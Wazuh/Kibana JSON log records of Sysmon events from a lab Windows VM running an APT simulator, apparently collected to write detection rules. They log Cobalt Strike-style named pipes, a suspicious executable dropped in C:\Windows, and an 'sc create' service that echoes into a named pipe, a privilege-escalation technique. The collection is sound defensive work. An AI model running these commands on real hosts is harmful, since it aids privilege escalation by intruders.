Named pipe msagent_fedac123 created
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "dF3TRoABWZBNLY4m4Lx9",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\TMP\\\\CreateNamedPipe.exe",
"processGuid": "{c64152da-f492-625f-9c05-000000000c00}",
"processId": "9092",
"utcTime": "2022-04-20 11:54:58.579",
"eventType": "CreatePipe",
"pipeName": "\\\\msagent_fedac123",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "17",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Pipe Created:\r\nRuleName: -\r\nEventType: CreatePipe\r\nUtcTime: 2022-04-20 11:54:58.579\r\nProcessGuid: {c64152da-f492-625f-9c05-000000000c00}\r\nProcessId: 9092\r\nPipeName: \\msagent_fedac123\r\nImage: C:\\TMP\\CreateNamedPipe.exe\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "1",
"systemTime": "2022-04-20T11:54:58.5799078Z",
"eventRecordID": "5599",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "17",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"17\",\"version\":\"1\",\"level\":\"4\",\"task\":\"17\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:54:58.5799078Z\",\"eventRecordID\":\"5599\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Pipe Created:\\r\\nRuleName: -\\r\\nEventType: CreatePipe\\r\\nUtcTime: 2022-04-20 11:54:58.579\\r\\nProcessGuid: {c64152da-f492-625f-9c05-000000000c00}\\r\\nProcessId: 9092\\r\\nPipeName: \\\\msagent_fedac123\\r\\nImage: C:\\\\TMP\\\\CreateNamedPipe.exe\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"eventType\":\"CreatePipe\",\"utcTime\":\"2022-04-20 11:54:58.579\",\"processGuid\":\"{c64152da-f492-625f-9c05-000000000c00}\",\"processId\":\"9092\",\"pipeName\":\"\\\\\\\\msagent_fedac123\",\"image\":\"C:\\\\\\\\TMP\\\\\\\\CreateNamedPipe.exe\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:28.592Z",
"location": "EventChannel",
"id": "1650455728.942410",
"timestamp": "2022-04-20T11:55:28.592+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:28.592Z"
],
"timestamp": [
"2022-04-20T11:55:28.592Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
],
"data.win.system.eventID": [
"@kibana-highlighted-field@17@/kibana-highlighted-field@"
]
},
"sort": [
1650455728592
]
}
Rules written.
Named pipe postex_ssh_fedac123 created
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "hl3TRoABWZBNLY4m7Lxf",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\TMP\\\\CreateNamedPipe.exe",
"processGuid": "{c64152da-f497-625f-a005-000000000c00}",
"processId": "8548",
"utcTime": "2022-04-20 11:55:03.377",
"eventType": "CreatePipe",
"pipeName": "\\\\postex_ssh_fedac123",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "17",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Pipe Created:\r\nRuleName: -\r\nEventType: CreatePipe\r\nUtcTime: 2022-04-20 11:55:03.377\r\nProcessGuid: {c64152da-f497-625f-a005-000000000c00}\r\nProcessId: 8548\r\nPipeName: \\postex_ssh_fedac123\r\nImage: C:\\TMP\\CreateNamedPipe.exe\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "1",
"systemTime": "2022-04-20T11:55:03.3780002Z",
"eventRecordID": "5609",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "17",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"17\",\"version\":\"1\",\"level\":\"4\",\"task\":\"17\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:03.3780002Z\",\"eventRecordID\":\"5609\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Pipe Created:\\r\\nRuleName: -\\r\\nEventType: CreatePipe\\r\\nUtcTime: 2022-04-20 11:55:03.377\\r\\nProcessGuid: {c64152da-f497-625f-a005-000000000c00}\\r\\nProcessId: 8548\\r\\nPipeName: \\\\postex_ssh_fedac123\\r\\nImage: C:\\\\TMP\\\\CreateNamedPipe.exe\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"eventType\":\"CreatePipe\",\"utcTime\":\"2022-04-20 11:55:03.377\",\"processGuid\":\"{c64152da-f497-625f-a005-000000000c00}\",\"processId\":\"8548\",\"pipeName\":\"\\\\\\\\postex_ssh_fedac123\",\"image\":\"C:\\\\\\\\TMP\\\\\\\\CreateNamedPipe.exe\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:33.214Z",
"location": "EventChannel",
"id": "1650455733.942410",
"timestamp": "2022-04-20T11:55:33.214+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:33.214Z"
],
"timestamp": [
"2022-04-20T11:55:33.214Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
],
"data.win.system.eventID": [
"@kibana-highlighted-field@17@/kibana-highlighted-field@"
]
},
"sort": [
1650455733214
]
}
Rules written.
Suspicious executable created
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "vV3URoABWZBNLY4mF7zD",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "System",
"processGuid": "{c64152da-7f8d-625e-eb03-000000000000}",
"processId": "4",
"utcTime": "2022-04-20 11:55:16.307",
"targetFilename": "C:\\\\Windows\\\\b6a1458f396.exe",
"creationUtcTime": "2022-04-19 10:30:46.233",
"user": "NT AUTHORITY\\\\SYSTEM"
},
"system": {
"eventID": "11",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"File created:\r\nRuleName: -\r\nUtcTime: 2022-04-20 11:55:16.307\r\nProcessGuid: {c64152da-7f8d-625e-eb03-000000000000}\r\nProcessId: 4\r\nImage: System\r\nTargetFilename: C:\\Windows\\b6a1458f396.exe\r\nCreationUtcTime: 2022-04-19 10:30:46.233\r\nUser: NT AUTHORITY\\SYSTEM\"",
"version": "2",
"systemTime": "2022-04-20T11:55:16.3224043Z",
"eventRecordID": "5648",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "11",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"11\",\"version\":\"2\",\"level\":\"4\",\"task\":\"11\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3224043Z\",\"eventRecordID\":\"5648\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"File created:\\r\\nRuleName: -\\r\\nUtcTime: 2022-04-20 11:55:16.307\\r\\nProcessGuid: {c64152da-7f8d-625e-eb03-000000000000}\\r\\nProcessId: 4\\r\\nImage: System\\r\\nTargetFilename: C:\\\\Windows\\\\b6a1458f396.exe\\r\\nCreationUtcTime: 2022-04-19 10:30:46.233\\r\\nUser: NT AUTHORITY\\\\SYSTEM\\\"\"},\"eventdata\":{\"utcTime\":\"2022-04-20 11:55:16.307\",\"processGuid\":\"{c64152da-7f8d-625e-eb03-000000000000}\",\"processId\":\"4\",\"image\":\"System\",\"targetFilename\":\"C:\\\\\\\\Windows\\\\\\\\b6a1458f396.exe\",\"creationUtcTime\":\"2022-04-19 10:30:46.233\",\"user\":\"NT AUTHORITY\\\\\\\\SYSTEM\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.307Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.307+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.307Z"
],
"timestamp": [
"2022-04-20T11:55:45.307Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745307
]
}
Named pipe 334485 created
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "rF3URoABWZBNLY4mE7y7",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"image": "C:\\\\TMP\\\\CreateNamedPipe.exe",
"processGuid": "{c64152da-f4a2-625f-a905-000000000c00}",
"processId": "8852",
"utcTime": "2022-04-20 11:55:14.666",
"eventType": "CreatePipe",
"pipeName": "\\\\334485",
"user": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "17",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Pipe Created:\r\nRuleName: -\r\nEventType: CreatePipe\r\nUtcTime: 2022-04-20 11:55:14.666\r\nProcessGuid: {c64152da-f4a2-625f-a905-000000000c00}\r\nProcessId: 8852\r\nPipeName: \\334485\r\nImage: C:\\TMP\\CreateNamedPipe.exe\r\nUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "1",
"systemTime": "2022-04-20T11:55:14.6665619Z",
"eventRecordID": "5631",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "17",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"17\",\"version\":\"1\",\"level\":\"4\",\"task\":\"17\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:14.6665619Z\",\"eventRecordID\":\"5631\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Pipe Created:\\r\\nRuleName: -\\r\\nEventType: CreatePipe\\r\\nUtcTime: 2022-04-20 11:55:14.666\\r\\nProcessGuid: {c64152da-f4a2-625f-a905-000000000c00}\\r\\nProcessId: 8852\\r\\nPipeName: \\\\334485\\r\\nImage: C:\\\\TMP\\\\CreateNamedPipe.exe\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"eventType\":\"CreatePipe\",\"utcTime\":\"2022-04-20 11:55:14.666\",\"processGuid\":\"{c64152da-f4a2-625f-a905-000000000c00}\",\"processId\":\"8852\",\"pipeName\":\"\\\\\\\\334485\",\"image\":\"C:\\\\\\\\TMP\\\\\\\\CreateNamedPipe.exe\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:43.440Z",
"location": "EventChannel",
"id": "1650455743.942410",
"timestamp": "2022-04-20T11:55:43.440+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:43.440Z"
],
"timestamp": [
"2022-04-20T11:55:43.440Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455743440
]
}
Service creation
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "vl3URoABWZBNLY4mF7zD",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-ac05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "3204",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.338",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc create tbbd05 binpath= \\\"%%COMSPEC%% /c echo b6a1458f396 > \\\\\\\\.\\\\pipe\\\\334485\\\" DisplayName= \\\"tbbd05\\\" start= demand",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.338\r\nProcessGuid: {c64152da-f4a4-625f-ac05-000000000c00}\r\nProcessId: 3204\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc create tbbd05 binpath= \"%%COMSPEC%% /c echo b6a1458f396 > \\\\.\\pipe\\334485\" DisplayName= \"tbbd05\" start= demand\r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.3433080Z",
"eventRecordID": "5649",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3433080Z\",\"eventRecordID\":\"5649\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.338\\r\\nProcessGuid: {c64152da-f4a4-625f-ac05-000000000c00}\\r\\nProcessId: 3204\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc create tbbd05 binpath= \\\"%%COMSPEC%% /c echo b6a1458f396 > \\\\\\\\.\\\\pipe\\\\334485\\\" DisplayName= \\\"tbbd05\\\" start= demand\\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 
11:55:16.338\",\"processGuid\":\"{c64152da-f4a4-625f-ac05-000000000c00}\",\"processId\":\"3204\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc create tbbd05 binpath= \\\\\\\"%%COMSPEC%% /c echo b6a1458f396 > \\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\334485\\\\\\\" DisplayName= \\\\\\\"tbbd05\\\\\\\" start= demand\",\"currentDirectory\":\"C:\\\\\\\\Users\\\\\\\\vagrant\\\\\\\\simulator\\\\\\\\APTSimulator\\\\\\\\\",\"user\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\",\"logonGuid\":\"{c64152da-7fad-625e-acb1-050000000000}\",\"logonId\":\"0x5b1ac\",\"terminalSessionId\":\"1\",\"integrityLevel\":\"High\",\"hashes\":\"SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\",\"parentProcessGuid\":\"{c64152da-8ec8-625e-8a02-000000000c00}\",\"parentProcessId\":\"8976\",\"parentImage\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\",\"parentCommandLine\":\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\cmd.exe\\\\\\\"\",\"parentUser\":\"DESKTOP-VAEP8K1\\\\\\\\vagrant\"}}}",
"input": {
"type": "log"
},
"@timestamp": "2022-04-20T11:55:45.332Z",
"location": "EventChannel",
"id": "1650455745.942410",
"timestamp": "2022-04-20T11:55:45.332+0000"
},
"fields": {
"@timestamp": [
"2022-04-20T11:55:45.332Z"
],
"timestamp": [
"2022-04-20T11:55:45.332Z"
]
},
"highlight": {
"agent.id": [
"@kibana-highlighted-field@001@/kibana-highlighted-field@"
]
},
"sort": [
1650455745332
]
}
Service started
{
"_index": "wazuh-archives-4.x-2022.04.20",
"_type": "_doc",
"_id": "x13URoABWZBNLY4mG7yu",
"_version": 1,
"_score": null,
"_source": {
"agent": {
"ip": "10.0.2.15",
"name": "DESKTOP-VAEP8K1",
"id": "001"
},
"manager": {
"name": "ubuntu-focal"
},
"data": {
"win": {
"eventdata": {
"originalFileName": "sc.exe",
"image": "C:\\\\Windows\\\\System32\\\\sc.exe",
"product": "Microsoft® Windows® Operating System",
"parentProcessGuid": "{c64152da-8ec8-625e-8a02-000000000c00}",
"description": "Service Control Manager Configuration Tool",
"logonGuid": "{c64152da-7fad-625e-acb1-050000000000}",
"parentCommandLine": "\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"",
"processGuid": "{c64152da-f4a4-625f-ad05-000000000c00}",
"logonId": "0x5b1ac",
"parentProcessId": "8976",
"processId": "5760",
"currentDirectory": "C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\",
"utcTime": "2022-04-20 11:55:16.359",
"hashes": "SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD",
"parentImage": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"ruleName": "technique_id=T1059,technique_name=Command-Line Interface",
"company": "Microsoft Corporation",
"commandLine": "sc start tbbd05",
"integrityLevel": "High",
"fileVersion": "10.0.19041.1 (WinBuild.160101.0800)",
"user": "DESKTOP-VAEP8K1\\\\vagrant",
"terminalSessionId": "1",
"parentUser": "DESKTOP-VAEP8K1\\\\vagrant"
},
"system": {
"eventID": "1",
"keywords": "0x8000000000000000",
"providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
"level": "4",
"channel": "Microsoft-Windows-Sysmon/Operational",
"opcode": "0",
"message": "\"Process Create:\r\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\r\nUtcTime: 2022-04-20 11:55:16.359\r\nProcessGuid: {c64152da-f4a4-625f-ad05-000000000c00}\r\nProcessId: 5760\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: sc start tbbd05 \r\nCurrentDirectory: C:\\Users\\vagrant\\simulator\\APTSimulator\\\r\nUser: DESKTOP-VAEP8K1\\vagrant\r\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\r\nLogonId: 0x5B1AC\r\nTerminalSessionId: 1\r\nIntegrityLevel: High\r\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\r\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\r\nParentProcessId: 8976\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \"C:\\Windows\\system32\\cmd.exe\" \r\nParentUser: DESKTOP-VAEP8K1\\vagrant\"",
"version": "5",
"systemTime": "2022-04-20T11:55:16.3609813Z",
"eventRecordID": "5658",
"threadID": "5384",
"computer": "DESKTOP-VAEP8K1",
"task": "1",
"processID": "5964",
"severityValue": "INFORMATION",
"providerName": "Microsoft-Windows-Sysmon"
}
}
},
"decoder": {
"name": "windows_eventchannel"
},
"full_log": "{\"win\":{\"system\":{\"providerName\":\"Microsoft-Windows-Sysmon\",\"providerGuid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\",\"eventID\":\"1\",\"version\":\"5\",\"level\":\"4\",\"task\":\"1\",\"opcode\":\"0\",\"keywords\":\"0x8000000000000000\",\"systemTime\":\"2022-04-20T11:55:16.3609813Z\",\"eventRecordID\":\"5658\",\"processID\":\"5964\",\"threadID\":\"5384\",\"channel\":\"Microsoft-Windows-Sysmon/Operational\",\"computer\":\"DESKTOP-VAEP8K1\",\"severityValue\":\"INFORMATION\",\"message\":\"\\\"Process Create:\\r\\nRuleName: technique_id=T1059,technique_name=Command-Line Interface\\r\\nUtcTime: 2022-04-20 11:55:16.359\\r\\nProcessGuid: {c64152da-f4a4-625f-ad05-000000000c00}\\r\\nProcessId: 5760\\r\\nImage: C:\\\\Windows\\\\System32\\\\sc.exe\\r\\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\\r\\nDescription: Service Control Manager Configuration Tool\\r\\nProduct: Microsoft® Windows® Operating System\\r\\nCompany: Microsoft Corporation\\r\\nOriginalFileName: sc.exe\\r\\nCommandLine: sc start tbbd05 \\r\\nCurrentDirectory: C:\\\\Users\\\\vagrant\\\\simulator\\\\APTSimulator\\\\\\r\\nUser: DESKTOP-VAEP8K1\\\\vagrant\\r\\nLogonGuid: {c64152da-7fad-625e-acb1-050000000000}\\r\\nLogonId: 0x5B1AC\\r\\nTerminalSessionId: 1\\r\\nIntegrityLevel: High\\r\\nHashes: SHA1=B4979A9F970029889713D756C3F123643DDE73DA,MD5=3FB5CF71F7E7EB49790CB0E663434D80,SHA256=41F067C3A11B02FE39947F9EBA68AE5C7CB5BD1872A6009A4CD1506554A9ABA9,IMPHASH=803254E010814E69947095A2725B2AFD\\r\\nParentProcessGuid: {c64152da-8ec8-625e-8a02-000000000c00}\\r\\nParentProcessId: 8976\\r\\nParentImage: C:\\\\Windows\\\\System32\\\\cmd.exe\\r\\nParentCommandLine: \\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \\r\\nParentUser: DESKTOP-VAEP8K1\\\\vagrant\\\"\"},\"eventdata\":{\"ruleName\":\"technique_id=T1059,technique_name=Command-Line Interface\",\"utcTime\":\"2022-04-20 
11:55:16.359\",\"processGuid\":\"{c64152da-f4a4-625f-ad05-000000000c00}\",\"processId\":\"5760\",\"image\":\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\sc.exe\",\"fileVersion\":\"10.0.19041.1 (WinBuild.160101.0800)\",\"description\":\"Service Control Manager Configuration Tool\",\"product\":\"Microsoft® Windows® Operating System\",\"company\":\"Microsoft Corporation\",\"originalFileName\":\"sc.exe\",\"commandLine\":\"sc start 